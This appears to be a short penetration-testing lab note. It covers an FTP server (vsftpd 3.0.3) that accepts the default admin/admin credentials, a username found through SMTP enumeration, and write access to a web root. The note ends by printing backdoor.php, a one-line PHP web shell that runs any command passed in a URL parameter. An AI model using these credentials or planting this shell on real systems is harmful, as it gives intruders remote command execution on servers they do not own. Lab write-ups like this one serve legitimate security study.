FTP

No anonymous access.

PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 3.0.3
|_banner: 220 (vsFTPd 3.0.3)
Service Info: OS: Unix

The password for the admin user was admin, i was able to find that there was indeed a user named admin in the smtp server because of the smtp-enum script.

In the FTP server I was able to put files onto the webserver.

ftp> ls
229 Entering Extended Passive Mode (|||59748|)
ftp: Can't connect to `192.168.143.56:59748': Connection timed out
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     0            4096 May 26  2020 contactform
drwxr-xr-x    2 1001     0            4096 May 26  2020 css
drwxr-xr-x    3 1001     0            4096 May 26  2020 img
-rw-r--r--    1 1001     0           23364 May 27  2020 index.php
drwxr-xr-x    2 1001     0            4096 May 26  2020 js
drwxr-xr-x   11 1001     0            4096 May 26  2020 lib
226 Directory send OK.
ftp> exit
221 Goodbye.

batcat backdoor.php 
───────┬─────────────────────────────────────────────────────────────────────────────────────────────────────────────
       │ File: backdoor.php
───────┼─────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   │ <pre>
   2   │ <?php
   3   │ system($_GET['cmd']);
   4   │ ?>
   5   │ </pre>
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────